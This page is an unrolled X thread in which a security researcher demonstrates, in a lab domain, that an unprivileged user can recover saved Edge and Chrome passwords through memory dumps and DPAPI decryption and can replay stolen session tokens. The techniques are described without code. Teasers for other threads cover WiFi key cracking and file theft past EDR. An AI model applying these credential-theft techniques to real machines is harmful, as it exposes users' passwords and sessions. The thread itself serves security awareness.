Share this page!

Enter URL or ID to Unroll

You can paste full URL like: https://x.com/threadreaderapp/status/1644127596119195649
or just the ID like: 1644127596119195649

How to get URL link on X (Twitter) App

  1. On the Twitter thread, click on or icon on the bottom
  2. Click again on or Share Via icon
  3. Click on Copy Link to Tweet
  4. Paste it above and click "Unroll Thread"!
  5. More info at Twitter Help
mRr3b00t Profile picture
@UK_Daniel_Card
May 6 24 tweets 8 min read Read on X
Scrolly
there seems to be some fun debate about Edge and it's storing all the passwords in RAM in clear text, vs chrome which stores the passwords upon use (e.g. one at a time) in RAM....

but chrome also stores the passwords in an SQL Lite file and the keys are protected by DPAPI!

Guess what a userland process can do?

It can get the keys! It can decrypt! Now you might be thinking... that's not true.... so let's see: to D LAB!Image
ok let's make sure I have a user! this is a good starting point :D Image
ok tony is logged in! let's go! Image
ok gang we have some creds in EDGE and CHROME! Image
now this is funny :D Image
HACKED! i have stolen iron man's password!

(from MSEDGE via memory dump from userland)

but what about chrome? Image
HACKED!!!! we haz hacked IRON MAN's CHOME as well! Image
and that was from userland on a NORMAL domain user account. no special privs. a fairly out the box windows 11 machine in an fairly out of the box active directory domain. Image
this is hopefully useful to know about DPAPI: Image
and look ma, we can export passwords from EDGE Image
oh we can do this from chrome as well...

we do need to enter creds to do this though (edge and chrome) Image
Image
so when we think about attacks we need to think about the fact there's different threat types:

the most common threat in the world is social engineering/phishing and online connected attacks (brute force, cred spray, cred stuffing etc. and more recently AITM)

Windows DPAPI by design let's a user process get key material.Image
there's now a native powershell tool (thanks Claudius!) to dump creds....

Nirsoft doesn't dump edge either.... Image
so Edge uses App-Bound Encryption (ABE)

learn.microsoft.com/en-us/deployed…Image
to note chrome can/does(?) also use ABE


I'm just working through some stuff...

if the attacker has admin/system they can do all kinds of stuff to get access to data...kaspersky.com/blog/chrome-ap…
So I’ve made some tools to get passwords from edge and chrome.

In my testing the result was from userland I dumped all the creds from chrome and edge 🤣🤣🤣🤣

So you know…… security is hard
ok i dumped chrome memory after reloading and no creds in RAM.

but let's use the browser.... i bet if we load the password manager ... Image
in chrome in RAM we can read strings, i can read the password from here: (not a shocker)

but full password list on process start does not populate! this behaviour is differnt to edge.

but i can read the entire SQL LITE DB and Decrypt using key material from DPAPI Image
now if we load: chrome://password-manager/passwords

the story changes. (need to check the delta between page load and entering the users password )
ok so memory scraping gets messy! but It's working...... Image
ok chrome is installed as a per user install which is why i can dump all the SQL lite and use DPAPI!

this is quite an important difference Image
so what have we learned?

1) dumping process memory is fun
2) chrome has seemingly better memory management processes than edge if memory scraping is a concern (it is)
3) userland installs of chrome aren't as safe as machine installs
4) if someone is running code that isn't you, you have lots of problems, edge memory scraping might be one.... there's probably others.
5) the design change between MS loading creds in RAM and chrome not, seems odd to me.
6) LLM guardrails are more like the priate code

hope people enjoyed this thread, as with all things 'it depends'

also i have awesome friends at Microsoft, people should remember that people work in companies. 🫡🤗🫶

credentials / key management is hard!
also for sake of SCIENCE: in chrome I've used a passkey to authenticate to a service and then I've copied the tokens from RAM for the sessions and then re-played them!

and yes the script is called COOKIEMONSTER :P Image
this would work with passwords, but i'd have the potential advantage of being able to re-authenticate using the username/password.

the sessions are time limited so from theft to re-use there is a time window.

clearly there's lots of complexity in the world of authentication and key management as well as defending against unauthorized or malicious code execution.

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with mRr3b00t

mRr3b00t Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @UK_Daniel_Card

mRr3b00t Profile picture
Aug 17, 2025
Damn you demo gods!

Ok so WiFi pews!

We have a few things setup!

Firstly the TP-Link to show how poor their defaults are (on most of their kit I find ITW)

You can crack the key space here in 4 minutes on a laptop with not mega GPU

One of the WiFi participants managed to capture the key material and then crack the hashes from the TP-link so they won some swag! (A shadow router and a tp link usb WiFi adaptor #ironic)

What didn’t work during the workshop was capturing a hash from the WPA2 PSK network on the UniFi gear…. And I don’t know why!

So time to investigate!Image
Image
ok so to explain the UNIFI setup a bit:

we have a Unifi Express 7! This has an ethernet WAN port. So because we want to have this as a mobile lab, we combine it with a GL-iNet Router via ethernet then we can use that router to get an internet connection (either WIFI repeater, Ethernet, USB 4G Modem)

(we could use other kit but this works well)

so here we have the GL-AXT1800 in WIFI repeater mode! so now are UNIFI router has internet access!Image
so here we have the Unify Console dashboard!

Next step let's go check out the wireless networks! Image
Read 18 tweets
mRr3b00t Profile picture
Aug 1, 2025
What could happen when you ban or put barriers in front of things on the internet?

Surely nothing bad could happen, because you are restricting of banning the bad thing right! *inserts Anakin/Padme meme*

#OnlineSafetyAct #UK Image
So let's look at the scenario:

Controls have been placed in front of adult content sites (where the visitor is 'from the UK') Image
Introducing the Online Safety Act (a UK Law which applies to UK Citizens/UK Organisations) - sitting in a global internet! (that's important to recognise) Image
Read 17 tweets
mRr3b00t Profile picture
May 29, 2025
I just stole a load of files using AnyDesk from a machine with MDE on it (EDR) (this is a demo they aren’t real files and I’m the owner)

30 files stolen…..

How many are in the logs as being accessed? Image
Image
As you can see here there are not 30 device events

also I can't see any DeviceFIleEvents because there were no files created or deleted/modified etc. Image
Now I’m going to steal some CIA (fictional) files via the WhatsApp desktop app! Image
Read 13 tweets
mRr3b00t Profile picture
Feb 21, 2025
I have hacked the Apple Advanced data protection disablement in the UK! Haha take that you bastards!!!! ✌️🤓 Image
😜🥸
Before people get their knickers in a twist I did no exploitation I simply decided to go back to my ancestorial roots!!
Read 8 tweets
mRr3b00t Profile picture
Feb 11, 2025
lol

The government don’t use SQqqqqlllllllll 🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣

Oh boy 🤣🤣🤣🤣🤣🤣🤣🤣

What else don’t they use? Oracle? Windows? VMware sphere? Come on 🤣🤣🤣🤣🤣🤣🤣🤣 Image
I have some news for people! The internet is visible to people... I know shocking isn't it!

ROFL Image
ALSO: SHAREPOINT runs on SQL!

LOL LOL LOL LOL LOL LOL LOL LOL
Read 23 tweets
mRr3b00t Profile picture
Jan 29, 2025
*puts kettle on*

nao.org.uk/wp-content/upl…Image
looks similar as almost every org I've worked with (super broad generalisation)

legacy systems oh my! wait till we see what runs in the private sector! (don't tell anyone about those 2008 servers!) Image
This might sound doom and gloom but having a view of maturity/resiliance across the government is a great thing! you can't address what you don't 'know' about!

This paragraph sounds in line with most orgs (IMHO)

I've been conducting maturity assessments for orgs of all shapes and sizes for a long long time! lots of people say they are a 3 when they are in fact a 1-2 (if we are using CMMi-SCV etc.)Image
Read 6 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us!

Send Email!

:(